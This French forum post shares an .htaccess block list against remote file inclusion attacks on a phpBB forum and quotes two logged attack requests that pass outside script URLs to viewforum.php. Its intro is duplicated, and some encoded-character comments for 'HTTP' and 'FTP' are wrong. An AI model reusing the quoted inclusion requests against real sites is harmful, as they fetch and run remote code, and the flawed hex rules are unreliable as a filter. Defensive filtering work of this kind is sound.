Bonjour,
Je mets ce message pour que vous puissiez protéger votre site et pour ne pas dégoutter les personnes d'ouvrir des sites face aux hackers.
L'avantage avec cette solution est que le hacker est stoppé par le serveur apache. :lol:
Avec la mise en place de CrackerTracker pour le forum phpbb, j'ai constaté la présence dans les logs d'instruction de ce type :
/forum/viewforum.php?f=http://amyru.h18.ru/images/cs.txt
/forum/viewforum.php?f=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Femesuki%2Fohuhud
En analysant les scripts qui sont transmis via http:// ... on s'aperçoit que ces scripts sont construits pour prendre la main sur les données sensibles de n'importe quel site (mot de passe de base de données, téléchargement de fichiers source en C ou en perl avec compilation de ceux ci, etc ...).
Ensuite, on trouve aussi des requetes comportant des caractères qui ne sont jamais transmis en temps normal :
[ (%5B) pour faire par exemple [1]
% (%25) pour ajouter une apostrophe dans la requete transmis %27
; (%3B) pour séparer plusieurs instructions en php, javascript, ...
Je vous livre mon fichier .htaccess qui protège l'ensemble de mon site contre ce type d'attaque. Ce fichier peut être complété et amélioré. Mais pour le moment, ça marche depuis plus 1 an.
L'inconveniant de cette protection est quelle vous bloque toutes les requetes comportant la chaine http ou ftp.
Ceci est une petite contribution, je ne savais pas où la mettre pour vous en faire profiter.
voilà.
Je mets ce message pour que vous puissiez protéger votre site et pour ne pas dégoutter les personnes d'ouvrir des sites face aux hackers.
L'avantage avec cette solution est que le hacker est stoppé par le serveur apache. :lol:
Avec la mise en place de CrackerTracker pour le forum phpbb, j'ai constaté la présence dans les logs d'instruction de ce type :
/forum/viewforum.php?f=http://amyru.h18.ru/images/cs.txt
/forum/viewforum.php?f=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Femesuki%2Fohuhud
En analysant les scripts qui sont transmis via http:// ... on s'aperçoit que ces scripts sont construits pour prendre la main sur les données sensibles de n'importe quel site (mot de passe de base de données, téléchargement de fichiers source en C ou en perl avec compilation de ceux ci, etc ...).
Ensuite, on trouve aussi des requetes comportant des caractères qui ne sont jamais transmis en temps normal :
[ (%5B) pour faire par exemple [1]
% (%25) pour ajouter une apostrophe dans la requete transmis %27
; (%3B) pour séparer plusieurs instructions en php, javascript, ...
Je vous livre mon fichier .htaccess qui protège l'ensemble de mon site contre ce type d'attaque. Ce fichier peut être complété et amélioré. Mais pour le moment, ça marche depuis plus 1 an.
Code:
RewriteEngine on
# ..... http
RewriteCond %{QUERY_STRING} ^(.*)http [NC]
RewriteRule ^(.*) - [F]
# ..... http (%68 %74 %74 %70) h
RewriteCond %{QUERY_STRING} ^(.*)%68 [NC]
RewriteRule ^(.*) - [F]
# ..... http (%68 %74 %74 %70) t
RewriteCond %{QUERY_STRING} ^(.*)%74 [NC]
RewriteRule ^(.*) - [F]
# ..... http (%68 %74 %74 %70) p
RewriteCond %{QUERY_STRING} ^(.*)%70 [NC]
RewriteRule ^(.*) - [F]
# ..... HTTP (%48 %84 %84 %80) H
RewriteCond %{QUERY_STRING} ^(.*)%48 [NC]
RewriteRule ^(.*) - [F]
# ..... HTTP (%48 %84 %84 %80) T
RewriteCond %{QUERY_STRING} ^(.*)%84 [NC]
RewriteRule ^(.*) - [F]
# ..... HTTP (%48 %84 %84 %80) P
RewriteCond %{QUERY_STRING} ^(.*)%80 [NC]
RewriteRule ^(.*) - [F]
# ..... ftp (%66 %74 %74 %70)
RewriteCond %{QUERY_STRING} ^(.*)ftp [NC]
RewriteRule ^(.*) - [F]
# ..... ftp (%66 %74 %74 %70) f
RewriteCond %{QUERY_STRING} ^(.*)%66 [NC]
RewriteRule ^(.*) - [F]
# ..... FTP (%46 %84 %84 %80) F
RewriteCond %{QUERY_STRING} ^(.*)%46 [NC]
RewriteRule ^(.*) - [F]
# .... include
RewriteCond %{QUERY_STRING} ^(.*)include [NC]
RewriteRule ^(.*) - [F]
# ..... wget
RewriteCond %{QUERY_STRING} ^(.*)wget [NC]
RewriteRule ^(.*) - [F]
# ....... %2B (+)
RewriteCond %{QUERY_STRING} ^(.*)%2B [NC]
RewriteRule ^(.*) - [F]
# ....... %25 (%)
RewriteCond %{QUERY_STRING} ^(.*)%25 [NC]
RewriteRule ^(.*) - [F]
# ....... %3B (;)
RewriteCond %{QUERY_STRING} ^(.*)%3B [NC]
RewriteRule ^(.*) - [F]
# ....... %28 (
RewriteCond %{QUERY_STRING} ^(.*)%28 [NC]
RewriteRule ^(.*) - [F]
# ....... %29 (
RewriteCond %{QUERY_STRING} ^(.*)%29 [NC]
RewriteRule ^(.*) - [F]
# ....... %5B ([)
RewriteCond %{QUERY_STRING} ^(.*)%5B [NC]
RewriteRule ^(.*) - [F]
# ....... ' (')
RewriteCond %{QUERY_STRING} ^(.*)' [NC]
RewriteRule ^(.*) - [F]
# ........... agent : libwww
RewriteCond %{HTTP_USER_AGENT} ^(.*)libwww [NC]
RewriteRule ^(.*) - [F]
L'inconveniant de cette protection est quelle vous bloque toutes les requetes comportant la chaine http ou ftp.
Ceci est une petite contribution, je ne savais pas où la mettre pour vous en faire profiter.
voilà.